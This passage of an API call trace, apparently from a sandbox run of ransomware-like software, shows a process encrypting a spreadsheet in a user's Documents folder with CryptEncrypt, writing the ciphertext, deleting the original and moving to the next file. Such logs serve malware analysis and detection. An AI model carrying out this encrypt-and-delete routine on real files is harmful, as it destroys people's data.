hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0078.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0078.277] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.277] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.277] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.278] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca910, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.278] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x12d19, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x12d20) returned 1 [0078.278] CharLowerBuffW (in: lpsz="byte[77089]", cchLength=0xb | out: lpsz="byte[77089]") returned 0xb [0078.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cace8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.279] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49287c0*, pdwDataLen=0x144e790*=0x12d19, dwBufLen=0x12d20 | out: pbData=0x49287c0*, pdwDataLen=0x144e790*=0x12d20) returned 1 [0078.280] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.280] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.280] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.284] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x12d20, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144f194*=0x12d20, lpOverlapped=0x0) returned 1 [0078.286] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0078.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca778, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0078.289] CryptDestroyKey (hKey=0x41ac200) returned 1 [0078.289] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.289] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.290] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.290] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0078.290] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0078.290] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.290] FreeLibrary (hLibModule=0x756e0000) returned 1 [0078.290] CloseHandle (hObject=0x298) returned 1 [0078.290] CloseHandle (hObject=0x258) returned 1 [0078.299] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\z6U2MzO.xlsx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\z6U2MzO.xlsx", lpFilePart=0x0) returned 0x26 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a088 [0078.300] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\z6U2MzO.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z6u2mzo.xlsx")) returned 0x20 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0078.300] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\z6U2MzO.xlsx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c157d0, ftCreationTime.dwHighDateTime=0x1d565c1, ftLastAccessTime.dwLowDateTime=0x1a915610, ftLastAccessTime.dwHighDateTime=0x1d5e185, ftLastWriteTime.dwLowDateTime=0x1a915610, ftLastWriteTime.dwHighDateTime=0x1d5e185, nFileSizeHigh=0x0, nFileSizeLow=0x12d19, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="z6U2MzO.xlsx", cAlternateFileName="Z6U2MZ~1.XLS")) returned 0x41ac600 [0078.301] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\z6U2MzO.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z6u2mzo.xlsx")) returned 1 [0078.353] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c157d0, ftCreationTime.dwHighDateTime=0x1d565c1, ftLastAccessTime.dwLowDateTime=0x1a915610, ftLastAccessTime.dwHighDateTime=0x1d5e185, ftLastWriteTime.dwLowDateTime=0x1a915610, ftLastWriteTime.dwHighDateTime=0x1d5e185, nFileSizeHigh=0x0, nFileSizeLow=0x12d19, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="z6U2MzO.xlsx", cAlternateFileName="Z6U2MZ~1.XLS")) returned 0 [0078.357] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0078.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0078.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0078.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a088 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0078.358] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0078.358] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7908 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0078.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0078.358] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.358] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0078.359] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0078.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0078.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0078.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0078.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0078.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9e48 [0078.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0078.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0078.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0078.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9938 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0078.360] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0078.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0078.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0078.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0078.360] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0078.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0078.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.360] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\z_HKc3lg6.pptx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa95ebd80, ftCreationTime.dwHighDateTime=0x1d59c9b, ftLastAccessTime.dwLowDateTime=0x5bc02500, ftLastAccessTime.dwHighDateTime=0x1d5bb04, ftLastWriteTime.dwLowDateTime=0x5bc02500, ftLastWriteTime.dwHighDateTime=0x1d5bb04, nFileSizeHigh=0x0, nFileSizeLow=0xf755, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="z_HKc3lg6.pptx", cAlternateFileName="Z_HKC3~1.PPT")) returned 0x41ac040 [0078.361] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0078.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0078.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0078.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0078.361] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0078.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0078.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22e0 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0078.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0078.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0078.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.362] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0078.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0078.362] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0078.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0078.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0078.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: 